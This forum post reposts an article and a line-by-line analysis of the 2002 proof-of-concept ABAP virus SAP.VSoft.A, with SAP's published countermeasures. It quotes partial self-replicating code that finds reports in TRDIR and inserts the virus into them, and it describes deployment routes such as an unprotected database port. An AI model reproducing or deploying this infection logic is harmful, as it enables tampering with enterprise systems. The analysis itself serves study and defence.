Age: 165 Joined: 04 Oct 2007 Posts: 1218 Location: Санкт-Петербург
Posted: Thu May 14, 2009 11:32 am Post subject: SAP Virus
SAP virus
Author: Tuncay Karaca
It is been quite a long time now; since first SAP virus appeared in year of 2002. It was the first and most likely the famous one till now; very last virus for enterprise application environment – SAP. It seems to be written earlier in 2000 as a proof-of-concept virus. Concept is proofing that not business application platform as SAP is not resistant from viruses. The Virus is also known as SAP.VSoft.A, SAP.Willi.A, ABAP/Rivpas was probably coded by some Spanish speaking guy as can be observed in its code. It is written in ABAP and its purpose is to spread itself without monitoring of its activity. Of course virus will not replicate in its form and it is needed to be installed manually for first time in SAP system and therefore is kind of intended virus. To be setup such a virus there always must be somebody with user’s authorization for accessing developer’s transaction like SE38/SE80. For detail analyses of this virus see here.
SAP AG published a consulting SAP note 512595 related to this virus describing its behavior and how to prevent it.
Until this “first occurrence” of SAP virus no other viruses for SAP business application platform has been reported. SAP AG is paying a lot of attention to secure its products. E.g. refer to its security guide, security portal on OSS, security notes in OSS components: BC-SEC or BC-SEC-VIR, etc. Within the NetWeaver platform there is a broad focus on security aspect. A brand new Virus Scan Interface (VSI) is available to be used for integrating external virus scanner programs into SAP system to for scanning files or documents that are processed by SAP applications for viruses. In case of ABAP Application server stack check following transactions: VSCAN, VSCANGROUP, VSCANPROFILE, VSCANTEST, VSCANTRACE. For overview of SAP’s data security products check out note 786179.
SAP virus, an analysis
Newsbytes has a report published in April 2002. Youĺl find my preliminary analysis here:
This is a preliminary analysis, but I think I got the big picture. The report might work as expected, but SAP programs contain some very weired constructs, so it may fail in the long run. I consider the infection module "proof-of-concept".
> REPORT VIRIISOFT. "(C) ViriiWare 2000
> * Primer Virus para SAP versión Listados en 24 Líneas de Código
> * Efectos: Solo se reproduce en reports y funciones.
> * Hay que descomentar las linea para que funcione correctamente.
SAPs report directory (potential targets)
> TABLES TRDIR.
Arrays holding program copies in memory (the names may clash with names in the program an generate syntax errors in infected programs). I would choose some other name that will have fewer clash chances.
> SELECT NAME INTO SY-TNAME FROM TRDIR WHERE UNAM NE 'Virii' AND
> ( SUBC = '1' OR ( SUBC = 'I' AND NAME LIKE 'L____U__' ) ).
A target is not changed by user "Virii" and has report type '1' (online report) or 'I' (include report, naming convention 'L____U__' looks for generated reports for funtion modules).
The report uses some "SY-" fields. These are predefined and automatically declared, so the report may be as unintrusive as possible. Caveat: Some SY- fields vanish in newer releases.
Delete all lines out of "SAPVirii" from the memory copy of the running program. All that remains is the virus code.
> LOOP AT VOUT INTO SY-ENTRY.
> IF SY-PAGNO = 3. SY-PAGNO = 0. ENDIF.
> SEARCH SY-ENTRY FOR 'SAPVirii'.
> IF SY-SUBRC = 0. SY-PAGNO = SY-PAGNO + 1. ENDIF.
> CHECK SY-PAGNO = 0. DELETE VOUT.
> ENDLOOP.
Now we insert the virus code into the memory copy of the target program at the remembered place.
> INSERT LINES OF VOUT FROM 1 INTO VIN INDEX SY-WILLI.
If the commentchar (*) is removed, insert the modified target report into the SAP database:
> *insert report sy-tname from vin. CLEAR SY. "<---Virii Activo
The next start of that report will infect another target. No need to compile, since SAP will do that for you.
I'm currently investigating whether or not the ABAP keyword INSERT REPORT will work in a productive system where report changes are not allowed. As of now, SAPs documentation said nothing about that, so I need to try it out.
Placeholder for malicious(?) actions...
> *Aquí va el código de destrucción o efectos del virus. "SAPVirii
^^^^^^^^^
End of virus code.
Nice. What do you need to implement it into SAP R/3?
A developer that changes a report (You need the SAP rights to do that and the system must allow changing of SAP reports for that). This should only be possible in development systems, not in production systems.
A developer creates the report in the development system and transports it into production. SAP logs these events.
A malicious user gets access to the SAP database an imports a modified report into the target system. Possible, if the customer did not protect the SAP database port with a firewall. At least for Oracle there is a Cut&Paste instruction available on my homepage.
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum You cannot attach files in this forum You can download files in this forum
All product names are trademarks of their respective companies. SAPNET.RU websites are in no way affiliated with SAP AG. SAP, SAP R/3, R/3 software, mySAP, ABAP, BAPI, xApps, SAP NetWeaver and any other are registered trademarks of SAP AG. Every effort is made to ensure content integrity. Use information on this site at your own risk.
